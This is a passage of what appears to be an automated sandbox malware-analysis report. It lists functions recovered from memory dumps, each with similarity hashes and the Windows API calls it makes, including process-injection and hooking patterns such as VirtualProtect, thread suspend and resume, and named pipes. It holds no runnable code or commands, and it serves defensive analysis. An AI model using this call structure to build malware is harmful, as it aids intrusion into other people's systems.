  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001D8A24
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6604, Relevance: 6.1, APIs: 4, Instructions: 83 Total matches: 29memoryregistry
Similarity
  • Total matches: 29
  • API ID: HeapFreeRegisterWaitForSingleObjectRtlAllocateHeapmemcpy
  • String ID:
  • API String ID: 1976740423-0
  • Opcode ID: 00e719380342739fce2d9a83077352ae1e8e636be9c83fb6a114a482fd48beda
  • Instruction ID: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
  • Opcode Fuzzy Hash: 8CF059B0118943C9E83B20D21991BBEAB423F935CBC0E4631E40308A4F1E4762B63A98
  • Instruction Fuzzy Hash: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C665D
  • memcpy.NTDLL(00000018,?,?), ref: 001C6686
  • RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_00005549,00000000,000000FF,00000008), ref: 001C66C5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C66D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE0EE, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 60
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7262, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 95string
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B33F3A, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 114
Similarity
  • Total matches: 114
  • API ID: CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 3243309207-0
  • Opcode ID: daf6b00ae99c80d22f011dd47a129de89f1e33b4c2e36c8a2c33b66dba590708
  • Instruction ID: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
  • Opcode Fuzzy Hash: 45E02B814FCFC2D7AB5F2404059175270E6EF60E05C9D9B647520BA5665E3031257E9B
  • Instruction Fuzzy Hash: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,01B37494,00000000), ref: 01B33F6C
  • CloseHandle.KERNEL32(01B37494), ref: 01B33FEC
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 01B33FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 01B33FD7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C7664, Relevance: 6.1, APIs: 4, Instructions: 74 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31395, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71 Total matches: 21memory
Similarity
  • Total matches: 21
  • API ID: GetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 2843147199-2746444292
  • Opcode ID: 7d6f6f6309830c53eb87eb1248ac9b1ade3661ad178ea1527cba377d544f1ce2
  • Instruction ID: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
  • Opcode Fuzzy Hash: BDE068961F0CC4E2C49844CC6273B01E3200FA055ACDDE72036A8340637A20F51DCBA4
  • Instruction Fuzzy Hash: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
APIs
  • memset.NTDLL ref: 01B313B5
    • Part of subcall function 01B33340: GetProcAddress.KERNEL32(01B3866B,01B345D9,00000000,01B3618C,00000000,00000000,?,?,?,01B311A6,?,01B3618C,00000000,00000000), ref: 01B33354
  • GetLastError.KERNEL32(00000001), ref: 01B31422
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B31433
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C28FD, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 55registrystring
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D799E, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 87string
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DD885, Relevance: 6.1, APIs: 4, Instructions: 61 Total matches: 76memorystring
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7471, Relevance: 6.1, APIs: 4, Instructions: 59 Total matches: 43stringthreadtime
Similarity
  • Total matches: 43
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamelstrcpy
  • String ID:
  • API String ID: 3418835849-0
  • Opcode ID: 48e92af7de5b1f14262d718c1bb04bd461a0a548bd9a3e9d293402e4cb923fe1
  • Instruction ID: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
  • Opcode Fuzzy Hash: 46D02B399919C4FB492B4468141036A4C8128283DD14C3553FC21055457F02318D3F26
  • Instruction Fuzzy Hash: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
  • lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB4E6, Relevance: 6.1, APIs: 4, Instructions: 57 Total matches: 46sleep
Similarity
  • Total matches: 46
  • API ID: RtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleep
  • String ID:
  • API String ID: 522987270-0
  • Opcode ID: 8cc2b4e76e7c6786e8c4d2b22bf8b4b6a679c49f941b40daf46a87d1c8b23fb6
  • Instruction ID: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
  • Opcode Fuzzy Hash: 1BE0DF31184C8ACB405B38B05C420B38FA9EB522D184CDF63DC00A216CBA63316F5EAB
  • Instruction Fuzzy Hash: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
APIs
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
  • Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2554, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4E59, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystring
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2884, Relevance: 6.0, APIs: 4, Instructions: 41 Total matches: 66filestringsynchronization
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBCD2, Relevance: 6.0, APIs: 4, Instructions: 39 Total matches: 99filesynchronizationpipe
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1E86, Relevance: 6.0, APIs: 4, Instructions: 39 Total matches: 34memorystring
Similarity
  • Total matches: 34
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeaplstrcpy
  • String ID:
  • API String ID: 1604688484-0
  • Opcode ID: 70e1818195bd2f9c5871c2ad9b4977da4bf534850ba99953615b9ffad3aae1f3
  • Instruction ID: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
  • Opcode Fuzzy Hash: E6D0A7BC444902D50C5B6427845C238C64A6EA03F4D0C0316EE66761EF7F4366F1EF56
  • Instruction Fuzzy Hash: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
APIs
  • InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
  • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001D931B: wsprintfA.USER32 ref: 001D936D
  • lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001DB703: memset.NTDLL ref: 001DB75F
    • Part of subcall function 001DB703: memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
    • Part of subcall function 001DB703: RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
    • Part of subcall function 001DB703: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
    • Part of subcall function 001DB703: CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
    • Part of subcall function 001DB703: CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
    • Part of subcall function 001DB703: GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDF8E, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 105memorythread
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B329FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: 524f9a7b75de6261c385ad020a1fd97dd94a45c24a600229a4b30a1cd107f5d7
  • Instruction ID: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
  • Opcode Fuzzy Hash: A0D0A9450DCCD2E2AA2A0C8B0C0C2200682ECB7B42C2C220435D01490DC3D1FEB0BF08
  • Instruction Fuzzy Hash: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,01B37494,01B31728,?,01B37494), ref: 01B32A0A
  • GetVersion.KERNEL32(?,01B37494), ref: 01B32A19
  • GetCurrentProcessId.KERNEL32(?,01B37494), ref: 01B32A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,01B37494), ref: 01B32A49
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B3464F, Relevance: 6.0, APIs: 4, Instructions: 32 Total matches: 128memorystring
Similarity
  • Total matches: 128
  • API ID: lstrlen$RtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 1738276641-0
  • Opcode ID: aaba7d0a47ca100521561682d36ca88f08b4b9b0e2dd2eccb0d3987922e97ba9
  • Instruction ID: 04f6259f9de803d6081a88a86dd7e0bed0a00ae35ae990a34112351bed970a8e
  • Opcode Fuzzy Hash: B7C012A4436C87C88CC059470679660D1C55FF6B0001C530BB0542A31D47523AB6758D
  • Instruction Fuzzy Hash: 04f6259f9de803d6081a88a86dd7e0bed0a00ae35ae990a34112351bed970a8e
APIs
  • lstrlenW.KERNEL32(00000000,01B342EB,?,01B32F72,00000000,FF571A75), ref: 01B34662
